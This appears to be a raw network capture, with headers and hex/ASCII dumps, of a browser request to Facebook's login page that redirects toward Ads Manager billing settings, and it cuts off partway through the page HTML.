                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:04 UTC1022INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: Xzmqm1mkMWPbi50OLq0bLqm+W9JpNCakp1U3TQB37VGAQDJv/QGUDKs883E+g88F9CZ+4eECG66CjGw0BLKwcQ==
                                                                                    2023-02-07 18:46:04 UTC1024INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 30 34 20 47 4d 54 0d 0a 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:04 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:04 UTC1024INData Raw: 31 30 32 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 61 67 4d 39 57 4d 77 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d
                                                                                    Data Ascii: 10299<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BagM9WMw">function envFlush(a){function b(b){for(var c in a)b[c]=
                                                                                    2023-02-07 18:46:04 UTC1026INData Raw: 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 6f 67 20 69 6e 20 6f 72 20 73 69 67 6e 20 75 70 20 74 6f 20 76 69 65 77 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 70 6f 73 74 73 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 6d 6f 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78
                                                                                    Data Ascii: //www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8Bx
                                                                                    2023-02-07 18:46:04 UTC1027INData Raw: 34 72 4a 74 4c 56 4d 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 76 36 59 65 42 69 45 22 20 6e 6f 6e 63 65 3d 22 42 61 67 4d 39 57 4d 77 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 61 67 4d 39 57 4d 77 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a
                                                                                    Data Ascii: 4rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="v6YeBiE" nonce="BagM9WMw"></script><script nonce="BagM9WMw">requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":
                                                                                    2023-02-07 18:46:04 UTC1028INData Raw: 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 36 34 32 31 5d 2c 5b 22 43 75 72 72 65 6e 74 41 64 41 63 63 6f 75 6e 74 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 44 5f 41 43 43 4f 55 4e 54 5f 49 44 22 3a 6e 75 6c 6c 7d 2c 36 38 32 38 5d 2c 5b 22 42
                                                                                    Data Ascii: "nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"facebook.com"},6421],["CurrentAdAccountInitialData",[],{"AD_ACCOUNT_ID":null},6828],["B
                                                                                    2023-02-07 18:46:04 UTC1030INData Raw: 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 52 4f 4f 4d 53 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 41
                                                                                    Data Ascii: e,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,"IS_WORKROOMS_USER":false,"A
                                                                                    2023-02-07 18:46:04 UTC1031INData Raw: 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54 45 5f 46 4f 52 5f 53 41 50 22 2c 22 45 4f 5f 44 49 53 41 42 4c 45 5f 53 59 53 54 45 4d 5f 53 45 52 49 41 4c 5f 4e 55 4d 42 45 52 5f 46 52
                                                                                    Data Ascii: latformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREATE_FOR_SAP","EO_DISABLE_SYSTEM_SERIAL_NUMBER_FR
                                                                                    2023-02-07 18:46:04 UTC1033INData Raw: 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53 63 45 22 2c 22 35 33 67 43 78 4b 71 32 38 31 47 22 2c 22 33 79 7a 7a 77 42 59 37 4e 70 6a 22 2c 22 31 6f 6e 7a 49 76 30 6a 48 36 48 22 2c 22 38 50 6c 4b 75 6f 77 61 66 65 38 22 2c 22 31 6e 74 6a 5a 32 7a 67 66 30 33 22 2c 22 34 53 49 48 32 47 52 56 58 35 57 22 2c 22 32 64 68 71 52 6e 71 58 47 4c 51 22 2c 22 32
                                                                                    Data Ascii: ID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVzvP3w","4NSq3ZC4ScE","53gCxKq281G","3yzzwBY7Npj","1onzIv0jH6H","8PlKuowafe8","1ntjZ2zgf03","4SIH2GRVX5W","2dhqRnqXGLQ","2
                                                                                    2023-02-07 18:46:04 UTC1034INData Raw: 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 22 2c 5b 5d 2c 7b 22 61 6c 6c 6f 77 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 69 76 65 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 6c 61 74 61 6d 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73
                                                                                    Data Ascii: 8],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/s
                                                                                    2023-02-07 18:46:04 UTC1036INData Raw: 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 69 41 67 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c
                                                                                    Data Ascii: nNameConfig",[],{"seed":"2iAg"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/l
                                                                                    2023-02-07 18:46:04 UTC1037INData Raw: 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 73 65 74 74 69 6e 67 73 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 61 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c 2f 73 6f 66 74 6e 75 64 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a
                                                                                    Data Ascii: ,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/z
                                                                                    2023-02-07 18:46:04 UTC1039INData Raw: 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 5c 2f 73 75 62 6d 69 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 6c 6f 67 69 6e 5c 2f
                                                                                    Data Ascii: ,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/
                                                                                    2023-02-07 18:46:04 UTC1040INData Raw: 49 41 7a 53 48 35 67 33 64 78 38 79 39 30 30 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 64 4a 59 55 66 5a 50 48 71 71 54 70 50 4b 4b 55 38 31 66 5f 65 43 42 46 71 44 79 38 4d 58 69 48 54 49 78 32 67 32 39 32 63 6c 56 57 34 33 36 51 59 36 51 79 35 66 67 68 45 68 74 30 4e 35 64 33 38 32 5f 56 77 77 6b 2d 49 41 7a 53 48 35 67 33 64 78 38 79 39 30 30 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 22 41 61 32 64 4a 59 55 66 5a 50 48 71 71 54 70 50 4b 4b 55 38 31 66 5f 65 43 42 46 71 44 79 38 4d 58 69 48 54
                                                                                    Data Ascii: IAzSH5g3dx8y900Y"]},-1],["cr:696703",[],{"__rc":[null,"Aa2dJYUfZPHqqTpPKKU81f_eCBFqDy8MXiHTIx2g292clVW436QY6Qy5fghEht0N5d382_Vwwk-IAzSH5g3dx8y900Y"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerImpl","Aa2dJYUfZPHqqTpPKKU81f_eCBFqDy8MXiHT
                                                                                    2023-02-07 18:46:04 UTC1042INData Raw: 38 79 39 30 30 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 32 64 4a 59 55 66 5a 50 48 71 71 54 70 50 4b 4b 55 38 31 66 5f 65 43 42 46 71 44 79 38 4d 58 69 48 54 49 78 32 67 32 39 32 63 6c 56 57 34 33 36 51 59 36 51 79 35 66 67 68 45 68 74 30 4e 35 64 33 38 32 5f 56 77 77 6b 2d 49 41 7a 53 48 35 67 33 64 78 38 79 39 30 30 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 2c 22 41 61 33 78 58 30 4e 72 6d 70 5f 66 69 66 7a 37 49 79 48 49 4b 42 33 43 39 44 79 5f 45 34 55 5a 4b 4e
                                                                                    Data Ascii: 8y900Y"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa2dJYUfZPHqqTpPKKU81f_eCBFqDy8MXiHTIx2g292clVW436QY6Qy5fghEht0N5d382_Vwwk-IAzSH5g3dx8y900Y"]},-1],["cr:729414",["VisualCompletion"],{"__rc":["VisualCompletion","Aa3xX0Nrmp_fifz7IyHIKB3C9Dy_E4UZKN
                                                                                    2023-02-07 18:46:04 UTC1043INData Raw: 49 55 72 49 6a 42 42 2d 78 53 6a 74 6c 6c 46 46 68 6d 4f 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 54 5a 4d 51 70 50 6d 75 36 49 70 31 64 4b 4d 62 6e 47 64 65 78 39 30 79 53 49 61 41 50 54 39 44 72 57 73 37 73 6e 45 6d 4d 45 38 6d 5a 68 54 73 7a 36 77 52 70 72 34 42 69 77 6f 49 65 52 7a 2d 41 6a 6c 64 58 38 39 50 4f 7a 31 4a 6f 36 6e 44 73 52 48 62 78 71 73 6f 79 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44 6f 6d 61 69 6e 22 5d 2c 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 22 5d 2c 5b 22 50 72 69 6d 65 72 22 5d 2c 5b 22 42 69 67 50 69 70 65 22 5d 2c 5b 22 42
                                                                                    Data Ascii: IUrIjBB-xSjtllFFhmOY"]},-1],["cr:1984081",[],{"__rc":[null,"Aa3TZMQpPmu6Ip1dKMbnGdex90ySIaAPT9DrWs7snEmME8mZhTsz6wRpr4BiwoIeRz-AjldX89POz1Jo6nDsRHbxqsoy"]},-1]],"require":[["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"],["Primer"],["BigPipe"],["B
                                                                                    2023-02-07 18:46:04 UTC1045INData Raw: 2f 6c 6f 67 69 6e 2f 3f 6c 6f 67 69 6e 5f 61 74 74 65 6d 70 74 3d 31 26 61 6d 70 3b 6c 77 76 3d 31 30 30 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 6e 6f 76 61 6c 69 64 61 74 65 3d 22 31 22 20 6f 6e 73 75 62 6d 69 74 3d 22 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6a 61 7a 6f 65 73 74 22 20 76 61 6c 75 65 3d 22 32 38 33 36 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 73 64 22 20 76 61 6c 75 65 3d 22 41 56 72 4f 4f 62 58 35 38 42 34 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 2f 3e 3c 74 61 62 6c 65 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 72 6f 6c 65 3d 22 70 72 65 73 65
                                                                                    Data Ascii: /login/?login_attempt=1&amp;lwv=100" method="post" novalidate="1" onsubmit=""><input type="hidden" name="jazoest" value="2836" autocomplete="off" /><input type="hidden" name="lsd" value="AVrOObX58B4" autocomplete="off" /><table cellspacing="0" role="prese
                                                                                    2023-02-07 18:46:04 UTC1046INData Raw: 6e 5f 55 53 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6e 65 78 74 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 5f 73 6f 75 72 63 65 22 20 76
                                                                                    Data Ascii: n_US" /><input type="hidden" autocomplete="off" name="next" value="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><input type="hidden" autocomplete="off" name="login_source" v
